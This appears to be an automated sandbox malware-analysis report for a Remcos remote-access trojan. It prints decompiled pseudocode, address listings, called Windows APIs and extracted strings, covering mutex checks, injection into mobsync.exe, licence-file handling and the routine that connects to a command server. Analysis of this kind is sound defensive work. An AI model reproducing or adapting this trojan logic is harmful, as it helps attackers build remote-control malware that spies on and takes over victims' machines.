							__eflags =  *0x46beb4;
							if( *0x46beb4 == 0) {
								_push(" (32 bit)");
							} else {
								_push(" (64 bit)");
							}
							L004059B5(_t269, 0x46c5b4, _t458);
							_t102 =  *0x46bd24;
							__eflags = _t102;
							if(_t102 != 0) {
								 *0x46a9d0 =  *_t102();
							}
							_t473 = 0x46c578;
							__eflags = _v776 - _t458;
							if(__eflags == 0) {
								_t429 = L00401E29(0x46c578, _t444, __eflags, 0x2e);
								__eflags =  *((char*)(L00401F75(_t429)));
								if(__eflags != 0) {
									__eflags =  *0x46bd24 - _t458; // 0x7536e630
									if(__eflags != 0) {
										__eflags =  *0x46a9d0 - _t458; // 0x1
										if(__eflags == 0) {
											_t444 = L00401F75(0x46c518);
											_t251 = E0041022B(0x46c518, _t250, "origmsc");
											_pop(_t431);
											__eflags = _t251;
											if(__eflags == 0) {
												L00405F2A(_t269, _t431, _t444);
											}
										} else {
											_push(_t429);
											_push(_t429);
											__eflags = L0040AAB0() - 0xffffffff;
											if(__eflags == 0) {
												E00406024(__eflags);
											}
										}
									}
								}
							}
							__eflags =  *((char*)(L00401F75(L00401E29(_t473, _t444, __eflags, 0x27))));
							if(__eflags != 0) {
								L0040D797();
							}
							L00409DCB(_t269, 0x46c4e8, L00401F75(L00401E29(_t473, _t444, __eflags, 0xb)));
							__eflags =  *((char*)(L00401F75(L00401E29(_t473, _t444, __eflags, 4))));
							 *0x46bb06 = __eflags != 0;
							__eflags =  *((char*)(L00401F75(L00401E29(_t473, _t444, __eflags, 5))));
							 *0x46baff = __eflags != 0;
							__eflags =  *((char*)(L00401F75(L00401E29(_t473, _t444, __eflags, 8))));
							 *0x46bb04 = __eflags != 0;
							__eflags =  *((char*)(L00401F75(L00401E29(_t473, _t444, __eflags, 3))));
							if(__eflags != 0) {
								_t237 = L00401F75(L00401E29(_t473, _t444, __eflags, 0x30));
								_t24 = _t237 + 2; // 0x2
								_t444 = _t24;
								do {
									_t419 =  *_t237;
									_t237 = _t237 + 2;
									__eflags = _t419 - _t458;
								} while (_t419 != _t458);
								__eflags = _t237 - _t444;
								if(__eflags != 0) {
									_t241 = L00401F75(L00401E29(_t473, _t444, __eflags, 9));
									_t243 = L00401F75(L00401E29(0x46c578, _t444, __eflags, 0x30));
									_t444 =  *_t241;
									L00401EDA(0x46c530,  *_t241, _t241, E004179B3( &_v780,  *_t241, _t243));
									L00401ED0();
									_t473 = 0x46c578;
								}
							}
							__eflags = _v776 - _t458;
							if(_v776 != _t458) {
								L00431810(_t458,  &_v524, _t458, 0x208);
								_t118 = L00402469();
								_t119 = L00401F75(0x46c560);
								_t445 = L00401F75(0x46c518);
								L00410420(_t121, "exepath",  &_v524, 0x208, _t119, _t118);
								_t493 = _t495 + 0x20;
								L00409DCB(_t269, 0x46c500,  &_v524);
								_t461 = 0x46c578;
								goto L47;
							} else {
								__eflags =  *0x46bb05;
								if(__eflags == 0) {
									L00409DCB(_t269, 0x46c500, "C:\Windows\SysWOW64\mobsync.exe");
								} else {
									_t226 = L00401F75(L00401E29(_t473, _t444, __eflags, 0x1e));
									_t228 = L00401F75(L00401E29(_t473, _t444, __eflags, 0xc));
									_t230 = L00401F75(L00401E29(0x46c578, _t444, __eflags, 9));
									__eflags =  *_t226;
									__eflags =  *_t228;
									_t473 = 0x46c578;
									_t232 = L00401F75(L00401E29(0x46c578, _t444,  *_t228, 0xa));
									L0040AD0A( *_t230, L00401F75(L00401E29(0x46c578, _t444, __eflags, 0x30)), _t232, ((_t229 & 0xffffff00 |  *_t226 != 0x00000000) & 0 | __eflags != 0x00000000) & 0x000000ff, (_t229 & 0xffffff00 |  *_t226 != 0x00000000) & 0x000000ff);
									_t495 = _t495 + 0xc;
									_t269 = 1;
									_t458 = 0;
								}
								_t202 = L00402469();
								_t447 = 2;
								_t386 =  ~(0 | __eflags > 0x00000000) | (_t202 + 0x00000001) * _t447;
								_push(_t386);
								_v780 = _t386;
								_t482 = L0042EE1E(_t386, (_t202 + 1) * _t447 >> 0x20, _t473, __eflags);
								__eflags = _t482;
								if(_t482 == 0) {
									_t482 = _t458;
								} else {
									L00431810(_t458, _t482, _t458, _v780);
									_t495 = _t495 + 0xc;
								}
								_t206 = L00401ECB(0x46c500);
								_t450 = _t482 - _t206;
								__eflags = _t450;
								_t463 = 2;
								do {
									_t389 =  *_t206 & 0x0000ffff;
									 *(_t206 + _t450) = _t389;
									_t206 = _t206 + _t463;
									__eflags = _t389;
								} while (_t389 != 0);
								_push(_t389);
								_t207 = L00402469();
								_t208 = L00401F75(0x46c560);
								_t209 = L00402469();
								E00410670(L00401F75(0x46c518), __eflags, "exepath", _t482, 2 + _t209 * 2, _t208, _t207); // executed
								L0042EE27(_t482);
								_t461 = 0x46c578;
								_push(_t269);
								_t215 = L00401F75(L00401E29(0x46c578, _t211, __eflags, 0x34));
								_t501 = _t495 + 0x1c - 0x18;
								E00402064(_t269, _t501, _t215);
								_push("licence");
								E00410497(0x46c518, L00401F75(0x46c518)); // executed
								_t493 = _t501 + 0x20;
								L00401E29(0x46c578, _t217, __eflags, 0xd);
								_t445 = "0";
								__eflags = L0040EE79(__eflags);
								if(__eflags == 0) {
									L47:
									_t127 = E00436079(_t125, L00401F75(L00401E29(_t461, _t445, __eflags, 0x28)));
									 *0x46bb07 = _t127;
									__eflags = _t127 - 2;
									if(_t127 != 2) {
										__eflags = _t127 - _t269;
										if(__eflags == 0) {
											_t380 = 0;
											__eflags = 0;
											goto L51;
										}
									} else {
										_t380 = _t269;
										L51:
										L004188B1(_t269, _t380, _t445);
										__eflags = 0;
										CreateThread(0, 0,  &M00418680, 0, 0, 0);
									}
									_t129 = L00401F75(L00401E29(_t461, _t445, __eflags, 0x37));
									_t131 = L00401F75(L00401E29(_t461, _t445, __eflags, 0x10));
									_t133 = L00401F75(L00401E29(_t461, _t445, __eflags, 0xf));
									__eflags =  *_t129;
									_t467 = 0x46c578;
									_t136 = E00436079(_t134, L00401F75(L00401E29(0x46c578, _t445,  *_t129, 0x36)));
									_t138 = L00401F75(L00401E29(0x46c578, _t445, __eflags, 0x11));
									E0040846F(_t131,  *_t133 & 0x000000ff,  *_t131 & 0x000000ff, L00401F75(L00401E29(0x46c578, _t445, __eflags, 0x31)), _t138, _t136, (_t132 & 0xffffff00 | __eflags != 0x00000000) & 0x000000ff); // executed
									__eflags =  *((intOrPtr*)(L00401F75(L00401E29(0x46c578, _t445, __eflags, 0x14)))) - 1;
									if(__eflags != 0) {
										_t457 = CreateThread;
									} else {
										_t191 = 2;
										_t481 = L0042EB70(_t445, 0x46c578, __eflags, _t191);
										 *_t481 = 0;
										_t378 = L00401E29(0x46c578, _t445, __eflags, 0x35);
										_t195 = L00401F75(_t378);
										_t457 = CreateThread;
										__eflags =  *_t195;
										 *((char*)(_t481 + 1)) = _t378 & 0xffffff00 | __eflags != 0x00000000;
										CreateThread(0, 0, E004152D7, _t481, 0, 0);
										_t467 = 0x46c578;
									}
									__eflags =  *((intOrPtr*)(L00401F75(L00401E29(_t467, _t445, __eflags, 0x16)))) - 1;
									if(__eflags == 0) {
										_t185 = 2;
										_t480 = L0042EB70(_t445, _t467, __eflags, _t185);
										 *_t480 = 1;
										_t374 = L00401E29(0x46c578, _t445, __eflags, 0x35);
										_t188 = L00401F75(_t374);
										__eflags =  *_t188;
										__eflags = 0;
										 *((char*)(_t480 + 1)) = _t374 & 0xffffff00 |  *_t188 != 0x00000000;
										CreateThread(0, 0, E004152D7, _t480, 0, 0);
										_t467 = 0x46c578;
									}
									__eflags =  *((intOrPtr*)(L00401F75(L00401E29(_t467, _t445, __eflags, 0x23)))) - 1;
									if(__eflags == 0) {
										 *0x46ba75 = 1;
										_t177 = L00401F75(L00401E29(_t467, _t445, __eflags, 0x25));
										_t179 = L00401F75(L00401E29(0x46c578, _t445, __eflags, 0x26));
										_t445 =  *_t177;
										L00401EDA(0x46c0e0,  *_t177, _t177, L00417967( &_v780,  *_t177, _t179));
										L00401ED0();
										__eflags = 0;
										CreateThread(0, 0, 0x401bad, 0, 0, 0);
										_t467 = 0x46c578;
									}
									__eflags =  *((intOrPtr*)(L00401F75(L00401E29(_t467, _t445, __eflags, 0x2b)))) - 1;
									if(__eflags == 0) {
										_t467 = L00401F75(L00401E29(_t467, _t445, __eflags, 0x2c));
										_t174 = E00436079(_t172, L00401F75(L00401E29(0x46c578, _t445, __eflags, 0x2d)));
										__eflags =  *_t467;
										_t445 = _t174;
										__eflags =  *_t467 != 0;
										L0040AA16(_t174);
									}
									_t152 = E004166F6( &_v772, _t457, __eflags); // executed
									L00401EDA(0x46c584, _t445, _t467, _t152);
									_t352 =  &_v776;
									L00401ED0();
									_t155 =  *0x46bd18;
									_t266 = 0;
									__eflags = _t155;
									if(_t155 != 0) {
										 *_t155(0); // executed
									}
									CreateThread(_t266, _t266, E0040D455, _t266, _t266, _t266); // executed
									__eflags =  *0x46bd4e;
									if( *0x46bd4e != 0) {
										CreateThread(_t266, _t266, 0x40f4b7, _t266, _t266, _t266);
									}
									__eflags =  *0x46bd4f;
									if( *0x46bd4f != 0) {
										CreateThread(_t266, _t266, 0x40f9d5, _t266, _t266, _t266);
									}
									_t157 =  *0x46a9d0; // 0x1
									_t158 = _t157 - _t266;
									__eflags = _t158;
									if(__eflags == 0) {
										goto L71;
									} else {
										__eflags = _t158 - 1;
										if(__eflags == 0) {
											_push("Administrator");
											goto L72;
										}
									}
									goto L73;
								} else {
									_t221 = L00401E29(0x46c578, "0", __eflags, 0xd);
									_t502 = _t493 - 0x18;
									_t445 = _t221;
									L00416C32(_t502, _t221);
									_t223 = E0040D1AD(__eflags);
									_t493 = _t502 + 0x18;
									__eflags = _t223 - _t269;
									if(__eflags != 0) {
										goto L47;
									} else {
										_t269 = 3;
										goto L45;
									}
								}
							}
						}
					} else {
						_v780 = 0;
						_t262 = E00410275(L00401F75(0x46c518), "WD",  &_v780);
						__eflags = _t262;
						if(_t262 != 0) {
							L004106D2(L00401F75(0x46c518), __eflags, "WD");
							L0040F785();
							L71:
							_push("User");
							L72:
							L004075C4(_t266, _t493 - 0x18, "Access level: ", _t457, __eflags, E00402064(_t266,  &_v776));
							E00402064(_t266, _t493 - 4, "[Info]");
							L004165D8(_t266, _t457);
							_t352 =  &_v784;
							L00401FA7(); // executed
							L73:
							E00411319(); // executed
							asm("int3");
							_push(_t467);
							_t477 = _t352 + 0x68;
							L0040D8B5(_t266, _t477, _t477);
							_t281 = _t477;
							 *_t281 = 0x4607a0;
							 *_t281 = 0x46075c;
							return L0042FE13(_t281);
						} else {
							goto L8;
						}
					}
				} else {
					__eflags =  *((char*)(__ecx + 1)) - 0x6c;
					if(__eflags != 0) {
						goto L6;
					} else {
						__eax =  *(__ecx + 2) & 0x000000ff;
						__eflags = __al;
						if(__eflags != 0) {
							goto L6;
						} else {
							_push(__ecx);
							_push(__ecx);
							__ecx =  &_v700;
							__eax = L0040D8E4( &_v700, __edx, __eflags, "licence_code.txt", 2);
							__ecx = 0x46c578;
							__ecx = L00401E29(0x46c578, __edx, __eflags, 0x34);
							__edx = __eax;
							__ecx =  &_v720;
							__eax = L0040EC5B( &_v720, __edx, __eflags);
							__ecx =  &_v720;
							__eax = L0040D895( &_v720, __edx, __eflags);
							__ecx =  &_v720;
							L74();
							__ecx =  &_v744;
							L00401FA7() = 0;
							__eax = 1;
							__eflags = 1;
							L5:
							return _t94;
						}
					}
				}
			}
































































































                              0x0040c641
                              0x0040c651
                              0x0040c654
                              0x0040c659
                              0x0040c663
                              0x0040c668
                              0x0040c672
                              0x0040c67b
                              0x0040c680
                              0x0040c684
                              0x0040c68d
                              0x0040c692
                              0x0040c698
                              0x0040c6ff
                              0x0040c6ff
                              0x0040c71d
                              0x0040c720
                              0x0040c742
                              0x0040c748
                              0x0040c750
                              0x0040c759
                              0x0040c762
                              0x0040c767
                              0x0040c76e
                              0x0040c77f
                              0x0040c781
                              0x0040c788
                              0x0040c78f
                              0x0040c794
                              0x0040c796
                              0x0040c79d
                              0x0040c7a3
                              0x0040c7cb
                              0x0040c7d6
                              0x0040c7e0
                              0x0040c7e2
                              0x0040c7e4
                              0x0040c7ec
                              0x0040c7f3
                              0x0040c7f3
                              0x0040c810
                              0x0040c812
                              0x0040c819
                              0x0040c81b
                              0x0040c825
                              0x0040c827
                              0x0040c82c
                              0x0040c83e
                              0x0040c845
                              0x0040c84d
                              0x0040c84f
                              0x0040c852
                              0x0040c858
                              0x0040c85e
                              0x0040c863
                              0x0040cc1b
                              0x0040cc1f
                              0x0040cc24
                              0x00000000
                              0x0040c869
                              0x0040c869
                              0x0040c879
                              0x0040c87f
                              0x0040c884
                              0x0040c88f
                              0x0040c894
                              0x0040c89d
                              0x0040c8a2
                              0x0040c8ad
                              0x0040c8b6
                              0x0040c8bb
                              0x0040c8c4
                              0x0040c8cd
                              0x0040c8c6
                              0x0040c8c6
                              0x0040c8c6
                              0x0040c8d2
                              0x0040c8d7
                              0x0040c8dc
                              0x0040c8de
                              0x0040c8e2
                              0x0040c8e2
                              0x0040c8e7
                              0x0040c8ec
                              0x0040c8f0
                              0x0040c8fb
                              0x0040c902
                              0x0040c905
                              0x0040c907
                              0x0040c90d
                              0x0040c90f
                              0x0040c915
                              0x0040c939
                              0x0040c93b
                              0x0040c940
                              0x0040c941
                              0x0040c943
                              0x0040c945
                              0x0040c945
                              0x0040c917
                              0x0040c917
                              0x0040c918
                              0x0040c91e
                              0x0040c921
                              0x0040c923
                              0x0040c923
                              0x0040c921
                              0x0040c915
                              0x0040c90d
                              0x0040c905
                              0x0040c95a
                              0x0040c95d
                              0x0040c95f
                              0x0040c95f
                              0x0040c97a
                              0x0040c993
                              0x0040c996
                              0x0040c9ad
                              0x0040c9b0
                              0x0040c9c7
                              0x0040c9ca
                              0x0040c9dd
                              0x0040c9e0
                              0x0040c9ed
                              0x0040c9f2
                              0x0040c9f2
                              0x0040c9f5
                              0x0040c9f5
                              0x0040c9f8
                              0x0040c9fb
                              0x0040c9fb
                              0x0040ca00
                              0x0040ca04
                              0x0040ca11
                              0x0040ca26
                              0x0040ca2b
                              0x0040ca3e
                              0x0040ca47
                              0x0040ca4c
                              0x0040ca4c
                              0x0040ca04
                              0x0040ca51
                              0x0040ca55
                              0x0040cc3a
                              0x0040cc49
                              0x0040cc51
                              0x0040cc6f
                              0x0040cc71
                              0x0040cc76
                              0x0040cc86
                              0x0040cc8b
                              0x00000000
                              0x0040ca5b
                              0x0040ca5b
                              0x0040ca62
                              0x0040caf8
                              0x0040ca68
                              0x0040ca73
                              0x0040ca85
                              0x0040ca9a
                              0x0040ca9f
                              0x0040caa7
                              0x0040caad
                              0x0040cac5
                              0x0040cadf
                              0x0040cae6
                              0x0040cae9
                              0x0040caea
                              0x0040caea
                              0x0040cb02
                              0x0040cb0c
                              0x0040cb14
                              0x0040cb16
                              0x0040cb17
                              0x0040cb20
                              0x0040cb23
                              0x0040cb25
                              0x0040cb37
                              0x0040cb27
                              0x0040cb2d
                              0x0040cb32
                              0x0040cb32
                              0x0040cb3e
                              0x0040cb47
                              0x0040cb47
                              0x0040cb49
                              0x0040cb4a
                              0x0040cb4a
                              0x0040cb4d
                              0x0040cb51
                              0x0040cb53
                              0x0040cb53
                              0x0040cb58
                              0x0040cb60
                              0x0040cb68
                              0x0040cb73
                              0x0040cb92
                              0x0040cb98
                              0x0040cba0
                              0x0040cba7
                              0x0040cbb1
                              0x0040cbb6
                              0x0040cbbc
                              0x0040cbc1
                              0x0040cbd2
                              0x0040cbd7
                              0x0040cbde
                              0x0040cbe3
                              0x0040cbef
                              0x0040cbf1
                              0x0040cc90
                              0x0040cca1
                              0x0040ccac
                              0x0040ccb2
                              0x0040ccb4
                              0x0040ccba
                              0x0040ccbc
                              0x0040ccbe
                              0x0040ccbe
                              0x00000000
                              0x0040ccbe
                              0x0040ccb6
                              0x0040ccb6
                              0x0040ccc0
                              0x0040ccc0
                              0x0040ccc5
                              0x0040ccd1
                              0x0040ccd1
                              0x0040ccde
                              0x0040ccf0
                              0x0040cd02
                              0x0040cd07
                              0x0040cd0c
                              0x0040cd29
                              0x0040cd3b
                              0x0040cd5a
                              0x0040cd72
                              0x0040cd74
                              0x0040cdbd
                              0x0040cd76
                              0x0040cd78
                              0x0040cd7f
                              0x0040cd8b
                              0x0040cd92
                              0x0040cd94
                              0x0040cd99
                              0x0040cd9f
                              0x0040cdb1
                              0x0040cdb4
                              0x0040cdb6
                              0x0040cdb6
                              0x0040cdd3
                              0x0040cdd5
                              0x0040cdd9
                              0x0040cde0
                              0x0040cdea
                              0x0040cdf1
                              0x0040cdf3
                              0x0040cdf8
                              0x0040cdfe
                              0x0040ce0a
                              0x0040ce0d
                              0x0040ce0f
                              0x0040ce0f
                              0x0040ce24
                              0x0040ce26
                              0x0040ce2c
                              0x0040ce39
                              0x0040ce4e
                              0x0040ce53
                              0x0040ce66
                              0x0040ce6f
                              0x0040ce74
                              0x0040ce80
                              0x0040ce82
                              0x0040ce82
                              0x0040ce97
                              0x0040ce99
                              0x0040ceb2
                              0x0040cec1
                              0x0040cec6
                              0x0040cec9
                              0x0040cecc
                              0x0040cecf
                              0x0040cecf
                              0x0040ced8
                              0x0040cee3
                              0x0040cee8
                              0x0040ceec
                              0x0040cef1
                              0x0040cef6
                              0x0040cef8
                              0x0040cefa
                              0x0040cefd
                              0x0040cefd
                              0x0040cf09
                              0x0040cf0b
                              0x0040cf12
                              0x0040cf1e
                              0x0040cf1e
                              0x0040cf20
                              0x0040cf27
                              0x0040cf33
                              0x0040cf33
                              0x0040cf35
                              0x0040cf3a
                              0x0040cf3a
                              0x0040cf3c
                              0x00000000
                              0x0040cf3e
                              0x0040cf3e
                              0x0040cf41
                              0x0040cf43
                              0x00000000
                              0x0040cf43
                              0x0040cf41
                              0x00000000
                              0x0040cbf7
                              0x0040cbfb
                              0x0040cc00
                              0x0040cc03
                              0x0040cc07
                              0x0040cc0c
                              0x0040cc11
                              0x0040cc14
                              0x0040cc16
                              0x00000000
                              0x0040cc18
                              0x0040cc1a
                              0x00000000
                              0x0040cc1a
                              0x0040cc16
                              0x0040cbf1
                              0x0040ca55
                              0x0040c7a5
                              0x0040c7a9
                              0x0040c7bc
                              0x0040c7c3
                              0x0040c7c5
                              0x0040cf58
                              0x0040cf62
                              0x0040cf67
                              0x0040cf67
                              0x0040cf6c
                              0x0040cf80
                              0x0040cf8f
                              0x0040cf94
                              0x0040cf9c
                              0x0040cfa0
                              0x0040cfa5
                              0x0040cfa5
                              0x0040cfaa
                              0x0040cfab
                              0x0040cfac
                              0x0040cfb1
                              0x0040cfb6
                              0x0040e3d2
                              0x0040c4fa
                              0x0040c506
                              0x00000000
                              0x00000000
                              0x00000000
                              0x0040c7c5
                              0x0040c69a
                              0x0040c69a
                              0x0040c69e
                              0x00000000
                              0x0040c6a0
                              0x0040c6a0
                              0x0040c6a4
                              0x0040c6a6
                              0x00000000
                              0x0040c6a8
                              0x0040c6a8
                              0x0040c6a9
                              0x0040c6b1
                              0x0040c6b5
                              0x0040c6bc
                              0x0040c6c6
                              0x0040c6cd
                              0x0040c6cf
                              0x0040c6d3
                              0x0040c6d8
                              0x0040c6dc
                              0x0040c6e1
                              0x0040c6e5
                              0x0040c6ea
                              0x0040c6f3
                              0x0040c6f5
                              0x0040c6f5
                              0x0040c6f6
                              0x0040c6fc
                              0x0040c6fc
                              0x0040c6a6
                              0x0040c69e

                              APIs
                              • OpenMutexA.KERNEL32 ref: 0040C7DA
                              • WaitForSingleObject.KERNEL32(00000000,0000EA60), ref: 0040C7EC
                              • CloseHandle.KERNEL32(00000000), ref: 0040C7F3
                              • CreateMutexA.KERNELBASE(00000000,00000001,00000000,00000000,0000000E), ref: 0040C852
                              • GetLastError.KERNEL32 ref: 0040C858
                              • GetModuleFileNameW.KERNEL32(00000000,C:\Windows\SysWOW64\mobsync.exe,00000104), ref: 0040C879
                                • Part of subcall function 0040EC5B: __EH_prolog.LIBCMT ref: 0040EC60
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.937782591.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.937867942.000000000046F000.00000040.00000001.sdmp Download File
                              Yara matches
                              Similarity
                              • API ID: Mutex$CloseCreateErrorFileH_prologHandleLastModuleNameObjectOpenSingleWait
                              • String ID: (32 bit)$ (64 bit)$Access level: $Administrator$C:\Windows\SysWOW64\mobsync.exe$Inj$ProductName$Remcos$Remcos-8VTGWT$Remcos_Mutex_Inj$SOFTWARE\Microsoft\Windows NT\CurrentVersion$Software\$User$[Info]$exepath$licence$licence_code.txt$origmsc
                              • API String ID: 1247502528-929690764
                              • Opcode ID: 1756edb8d8676bbec70d225e95beccb275aa19672e5e980b2ada83bd84d92b62
                              • Instruction ID: 42bfda91432e7fc4dea79f371f9b9f268822a4ed28c20108b284d7b9b352ec02
                              • Opcode Fuzzy Hash: 1756edb8d8676bbec70d225e95beccb275aa19672e5e980b2ada83bd84d92b62
                              • Instruction Fuzzy Hash: 6132F460B443516BDA15B7729CA7B3E25898B81748F04053FF542BB2E3EEBC9D41839E
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00411319, Relevance: 28.7, APIs: 6, Strings: 10, Instructions: 728sleepnetworkthreadCOMMON
                              Download Yara Rule
                              C-Code - Quality: 85%
                              			E00411319() {
				struct _SECURITY_ATTRIBUTES* _v8;
				char _v20;
				char _v32;
				char _v56;
				char _v80;
				char _v104;
				char _v128;
				char _v140;
				void* _v163;
				char _v164;
				char _v188;
				char _v212;
				char _v236;
				char _v260;
				char _v284;
				char _v308;
				char _v332;
				char _v356;
				char _v380;
				char _v404;
				char _v428;
				char _v452;
				char _v476;
				char _v500;
				char _v524;
				char _v548;
				char _v572;
				char _v596;
				char _v620;
				char _v644;
				char _v668;
				char _v692;
				char _v716;
				char _v740;
				char _v764;
				char _v788;
				char _v812;
				char _v836;
				char _v860;
				char _v884;
				char _v908;
				char _v932;
				char _v956;
				char _v980;
				char _v1004;
				char _v1028;
				char _v1052;
				char _v1076;
				char _v1100;
				char _v1124;
				char _v1148;
				char _v1172;
				char _v1196;
				char _v1220;
				char _v1244;
				char _v1268;
				char _v1292;
				char _v1316;
				char _v1340;
				char _v1364;
				char _v1388;
				char _v2388;
				signed int _t162;
				void* _t164;
				long _t168;
				void* _t170;
				signed char _t174;
				void* _t180;
				short _t191;
				void* _t193;
				void* _t194;
				void* _t196;
				long _t200;
				short _t205;
				void* _t206;
				void* _t208;
				void* _t221;
				void* _t229;
				void* _t230;
				void* _t233;
				intOrPtr* _t234;
				void* _t237;
				void* _t238;
				void* _t239;
				void* _t242;
				void* _t244;
				void* _t247;
				void* _t248;
				void* _t249;
				void* _t250;
				void* _t252;
				void* _t253;
				void* _t254;
				intOrPtr* _t345;
				void* _t359;
				void* _t361;
				void* _t363;
				void* _t365;
				void* _t367;
				long _t371;
				void* _t372;
				void* _t373;
				char* _t393;
				void* _t601;
				void* _t610;
				void* _t660;
				signed short _t664;
				struct _SECURITY_ATTRIBUTES* _t667;
				void* _t677;
				void* _t678;
				void* _t679;
				void* _t680;
				void* _t681;
				void* _t682;
				void* _t683;
				void* _t684;
				void* _t686;
				void* _t687;
				void* _t691;
				void* _t692;
				void* _t693;
				void* _t694;
				void* _t695;
				long _t697;

				_push(_t372);
				E004020B5(_t372,  &_v104);
				L00416934( &_v236, _t601);
				E004020B5(_t372,  &_v1388);
				_t660 = 0x46c578;
				_t162 = E00436079(_t160, L00401F75(L00401E29(0x46c578, _t601, _t695, 0x29)));
				if(_t162 != 0) {
					_t371 = _t162 * 0x3e8;
					_t697 = _t371;
					Sleep(_t371);
				}
				_t678 = _t677 - 0x18;
				E00402064(_t372, _t678, 0x4657dc);
				_t164 = L00401E29(_t660, _t601, _t697, 0);
				_t679 = _t678 - 0x18;
				E004020CC(_t372, _t679, _t601, _t697, _t164);
				L00416DD0( &_v32, _t601);
				_t680 = _t679 + 0x30;
				_t667 = 0;
				_v8 = 0;
				_t373 = 0;
				L00401E29(_t660, _t601, _t697, 0x3a);
				_t602 = 0x45f6ac;
				_t168 = L0040EE79(_t697);
				_t698 = _t168;
				if(_t168 != 0) {
					L00401E29(_t660, 0x45f6ac, _t698, 0x3a);
					_t359 = L00402469();
					_t361 = L00401F75(L00401E29(_t660, 0x45f6ac, _t698, 0x3a));
					L00401E29(_t660, 0x45f6ac, _t698, 0x39);
					_t363 = L00402469();
					_t365 = L00401F75(L00401E29(_t660, _t602, _t698, 0x39));
					L00401E29(_t660, _t602, _t698, 0x38);
					_t367 = L00402469();
					L00401F75(L00401E29(_t660, _t602, _t698, 0x38));
					_t602 = _t367;
					L0040484C(_t367, _t365, _t363, _t361, _t359);
					_t680 = _t680 + 0x10;
					_t667 = 0;
				}
				L4:
				_t681 = _t680 - 0x18;
				E00402064(_t373, _t681, 0x4657e0);
				_t170 = L00401E29( &_v32, _t602, _t698, _t373);
				_t682 = _t681 - 0x18;
				E004020CC(_t373, _t682, _t602, _t698, _t170);
				L00416DD0( &_v20, _t602);
				_t680 = _t682 + 0x30;
				L00401E29( &_v20, _t602, _t698, 2);
				_t603 = "0";
				_t174 = L00405A22("0");
				asm("sbb al, al");
				 *0x46bae0 =  ~_t174 + 1;
				E00404955(0x46c768);
				if(_t667 >= 0 || E004021D5( &_v32) > 1) {
					_t701 =  *0x46c769 - 1;
					_t393 =  &_v104;
					if( *0x46c769 != 1) {
						_push(0x45f6ac);
					} else {
						_push(" (TLS)");
					}
					L004059BE(_t373, _t393);
					_t683 = _t680 - 0x18;
					_t180 = L00401E29( &_v20, _t603, _t701, 1);
					_t602 = L00402F73(_t373,  &_v128, E0040530D(_t373,  &_v56, L004075E8( &_v80, "Connecting to ", _t701, L00401E29( &_v20, _t603, _t701, 0)), _t660, _t701, 0x4657e0), _t701, _t180);
					L00402F73(_t373, _t683, _t184, _t701,  &_v104);
					_t684 = _t683 - 0x14;
					E00402064(_t373, _t684, "[Info]");
					L004165D8(_t373, _t660);
					_t680 = _t684 + 0x30;
					L00401FA7();
					L00401FA7();
					L00401FA7();
					_t667 = _v8;
				}
				_t191 = 2;
				 *0x46bacc = _t191;
				_t193 = L00401F75(L00401E29( &_v20, _t602, _t701, 0));
				__imp__#52(_t193); // executed
				_t702 = _t193;
				if(_t193 != 0) {
					L00431DF0(0x46bad0,  *((intOrPtr*)( *((intOrPtr*)(_t193 + 0xc)))),  *((short*)(_t193 + 0xa)));
					_t205 = E00436079(_t203, L00401F75(L00401E29( &_v20, _t602, _t702, 1)));
					__imp__#9();
					_t680 = _t680 + 0xc - 0x10;
					 *0x46bace = _t205;
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t206 = L004049D2(_t602, _t205);
					_t703 = _t206;
					if(_t206 != 0) {
						_t686 = _t680 - 0x18;
						_t208 = L00401E29( &_v20, _t602, _t703, 1);
						_t610 = L00402F73(_t373,  &_v56, E0040530D(_t373,  &_v188, L004075E8( &_v212, "Connected to  ", _t703, L00401E29( &_v20, _t602, _t703, 0)), 0x46c768, _t703, 0x4657e0), _t703, _t208);
						L00402F73(_t373, _t686, _t610, _t703,  &_v104);
						_t687 = _t686 - 0x14;
						E00402064(_t373, _t687, "[Info]");
						L004165D8(_t373, 0x46c768);
						L00401FA7();
						L00401FA7();
						L00401FA7();
						L00404E64(0x46c768, 0xa, 0);
						_v164 = 0;
						asm("stosd");
						_v8 = 1;
						asm("stosd");
						asm("stosd");
						asm("stosd");
						asm("stosd");
						_t221 = L00416852(0x46c768);
						_push(_t610);
						E00411302( &_v164, "%I64u", _t221);
						E00407352(_t373,  &_v128, _t610, _t703, 0x46c3b0);
						L0043A6FF( &_v128,  *0x46a9d0,  &_v140, 0xa);
						E004020CC(_t373,  &_v80, _t610, _t703, L00401E29(0x46c578, _t610, _t703, 1));
						_t229 = L00402469();
						_t230 = L00401F75(0x46c560);
						_t233 = L00410420(L00401F75(0x46c518), "name",  &_v2388, 0x104, _t230, _t229);
						_t691 = _t687 + 0x60;
						if(_t233 != 0) {
							L004059BE(_t373,  &_v80,  &_v2388);
						}
						_t234 =  *0x46bd44; // 0x0
						_t664 = 0;
						_t705 = _t234;
						if(_t234 != 0) {
							_t664 =  *_t234() & 0x0000ffff;
						}
						E0040425F(_t373,  &_v56, "C:\Windows\SysWOW64\mobsync.exe");
						_t692 = _t691 - 0x18;
						_t237 = L00416CF4(_t373,  &_v1364, 0x46c500);
						_t238 = L00416B7E(_t373,  &_v1340, _t664 & 0x0000ffff);
						_t239 = L00401E29( &_v20, _t664 & 0x0000ffff, _t705, 0);
						_t242 = L00416B7E(_t373,  &_v1316, GetTickCount());
						_t244 = L00416B7E(_t373,  &_v1292, L00416B2E( &_v1316));
						_t247 = L00416CF4(_t373,  &_v1244, L00416AF4( &_v1268));
						_t248 = L00416CF4(_t373,  &_v1220, 0x46c0e0);
						_t249 = L00416CF4(_t373,  &_v1196,  &_v56);
						_t250 = L00416CF4(_t373,  &_v1172,  &_v128);
						_t252 = L00416CF4(_t373,  &_v1148, 0x46c868);
						_t253 = L0040D585( &_v1124);
						_t254 = L00416CF4(_t373,  &_v1100, 0x46c584);
